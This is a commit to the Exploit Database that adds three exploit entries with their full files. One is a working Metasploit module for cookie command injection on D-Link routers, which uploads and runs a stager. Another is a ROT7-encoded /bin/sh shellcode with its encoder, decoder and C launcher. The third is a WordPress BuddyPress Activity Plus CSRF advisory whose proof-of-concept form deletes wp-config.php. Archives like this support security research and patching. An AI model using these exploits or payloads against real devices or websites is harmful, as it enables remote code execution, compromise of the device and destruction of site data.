DB: 2015-07-18

3 new exploits
This commit is contained in:
Offensive Security 2015-07-18 05:02:00 +00:00
parent 5454188b4e
commit e4d0bdd544
4 changed files with 321 additions and 0 deletions

View file

@ -33849,6 +33849,7 @@ id,file,description,date,author,platform,type,port
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
37494,platforms/php/webapps/37494.txt,"Wordpress S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download",2015-07-05,CrashBandicot,php,webapps,0
37495,platforms/lin_x86/shellcode/37495.py,"Linux x86 /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0
37500,platforms/php/webapps/37500.txt,"Funeral Script PHP Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-17,snup,php,webapps,0
37501,platforms/php/webapps/37501.rb,"WordPress Generic Plugin Arbitrary File Upload Vulnerability",2012-07-13,KedAns-Dz,php,webapps,0
37502,platforms/php/webapps/37502.txt,"Elite Bulletin Board Multiple SQL Injection Vulnerabilities",2012-07-15,ToXiC,php,webapps,0
@ -33960,3 +33961,5 @@ id,file,description,date,author,platform,type,port
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - CSRF and XSS Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0
37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0
37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Cookie Command Execution',
'Description' => %q{
This module exploits an anonymous remote upload and code execution vulnerability on different
D-Link devices. The vulnerability is a command injection in the cookie handling process of the
lighttpd web server when handling specially crafted cookie values. This module has been
successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment.
},
'Author' =>
[
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC
],
'DisclosureDate' => 'Jun 12 2015',
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 1
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Uploading stager ...")
@counter = 1
execute_cmdstager(
:flavor => :echo,
:linemax => 95 # limited by our upload, larger payloads crash the web server
)
print_status("#{peer} - creating payload and executing it ...")
(1 .. @counter).each do |act_file|
# the http server blocks access to our files ... we copy it to a new one
# the length of our command is restricted to 19 characters
cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "chmod +x /tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "/tmp/#{act_file+@counter}"
execute_final_command(cmd)
cmd = "rm /tmp/#{act_file}"
execute_final_command(cmd)
cmd = "rm /tmp/#{act_file+@counter}"
execute_final_command(cmd)
end
end
def execute_command(cmd,opts)
# upload our stager to a shell script
# upload takes quite long because there is no response from the web server
file_upload = "#!/bin/sh\n"
file_upload << cmd << "\n"
post_data = Rex::MIME::Message.new
post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"")
post_data.bound = "-#{rand_text_alpha(12)}--"
file = post_data.to_s
@counter = @counter + 1
begin
send_request_cgi({
'method' => 'POST',
'uri' => "/web_cgi.cgi",
'vars_get' => {
'&request' =>'UploadFile',
'path' => '/tmp/'
},
'encode_params' => false,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => file
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def execute_final_command(cmd)
# very limited space - larger commands crash the webserver
fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18
begin
send_request_cgi({
'method' => 'GET',
'uri' => "/",
'cookie' => "i=`#{cmd}`"
}, 5)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

View file

@ -0,0 +1,104 @@
# Shellcode Title: ROT7
# Date: 5 July 2015
# Exploit Author: Artem Tsvetkov
# Software Link:
https://github.com/adeptex/SLAE/tree/master/Assignment-6/rot7
# Tested on: Kali GNU/Linux 1.1.0
# Platform: x86 Linux
This code was created as an exercise for the SecurityTube Linux Assembly
Expert (SLAE).
The following will produce rot7-encoded shellcode using a custom scheme to
dynamically set the shellcode length. The length is used by the decoder to
determine when it should stop decoding.
#!/usr/bin/python
# Python ROT-7 Encoder
# execve 24 bytes
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)
# byte[0] == shellcode length
encoded = "\\x%02x," % len(bytearray(shellcode))
encoded2 = "0x%02x," % len(bytearray(shellcode))
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
# boundary is computed as 255-ROT(x) where x, the amount to rotate by
if x > 248:
encoded += '\\x'
encoded += '%02x' %(7 -(256 - x))
encoded2 += '0x'
encoded2 += '%02x,' %(7 -(256 - x))
else:
encoded += '\\x'
encoded += '%02x'%(x+7)
encoded2 += '0x'
encoded2 += '%02x,' %(x+7)
print '\n%s\n\n%s\n\nShellcode Length: %d\n' % (encoded, encoded2,
len(bytearray(shellcode)))
The following is the NASM decoder:
; ROT7 NASM decoder
global _start
section .text
_start:
jmp short stage
decoder:
pop esi ; shellcode address
mov al, byte [esi] ; shellcode length
xor ecx, ecx ; position
decode:
mov bl, byte [esi+ecx+1] ; get rot'ed byted
sub bl, 0x7 ; rot it back (-7)
mov byte [esi+ecx], bl ; store it in shellcode
inc ecx ; next position
cmp al, cl ; check if reached the end of shellcode
jnz short decode ; if not, continue derot'ing
jmp shellcode ; else, execute derot'ed shellcode
stage:
call decoder
; Shellcode Format:
; byte[0] = length of shellcode (max 0xff)
; byte[1..] = rot'ed shellcode
shellcode: db
0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
/*
* Sample run
*
* Compile with: gcc rot7.c -o rot7
*
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x16\x5e\x8a\x06\x31\xc9\x8a\x5c\x0e\x01\x80\xeb\x07\x88\x1c\x0e\x41\x38\xc8\x75\xf1\xeb\x05\xe8\xe5\xff\xff\xff\x18\x38\xc7\x57\x6f\x36\x36\x7a\x6f\x6f\x36\x69\x70\x75\x90\xea\x38\xd0\x90\xd1\x71\x12\x5f\xd4\x87";
int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

62
platforms/php/webapps/37629.txt Executable file
View file

@ -0,0 +1,62 @@
Details
================
Software: BuddyPress Activity Plus
Version: 1.5
Homepage: http://wordpress.org/plugins/buddypress-activity-plus/
Advisory report: https://security.dxw.com/advisories/csrf-and-arbitrary-file-deletion-in-buddypress-activity-plus-1-5/
CVE: Awaiting assignment
CVSS: 8.5 (High; AV:N/AC:L/Au:N/C:N/I:P/A:C)
Description
================
CSRF and arbitrary file deletion in BuddyPress Activity Plus 1.5
Vulnerability
================
An attacker can delete any file the PHP process can delete.
For this to happen, a logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
Proof of concept
================
Ensure your PHP user can do maximum damage:
sudo chown www-data:www-data /var/vhosts/my-wordpress-site
Visit a page containing this as a logged-in user and click submit:
<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
<input type=\"text\" name=\"action\" value=\"bpfb_remove_temp_images\">
<input type=\"text\" name=\"data\" value=\"bpfb_photos[]=../../../../wp-config.php\">
<input type=\"submit\">
</form>
If the server is set up so that the php user has more restricted permissions, then an attacker will at least be able to delete files from the uploads directory.
Note that you can also delete as many things as you like at once $_POST[data] is run through parse_str() which parses it as a query string, so just keep adding “&bpfb_photos[]=path/to/file” to the end until you have all known files.
There is an identical attack available only when BP Group Documents is also installed. Just replace “bpfb_remove_temp_images” with “bpfb_remove_temp_documents” and in data replace “bpfb_photos” with “bpfb_documents”.
Mitigations
================
Upgrade to version 1.6.2 or later
If this is not possible, ensure that the PHP user on the server does not have permission to delete files like wp-config.php.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2013-08-22: Discovered
2015-07-13: Reported to vendor via contact form at https://premium.wpmudev.org/contact/
2015-07-13: Requested CVE
2015-07-13: Vendor responded
2015-07-14: Vendor reported issue fixed
2015-07-14: Published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.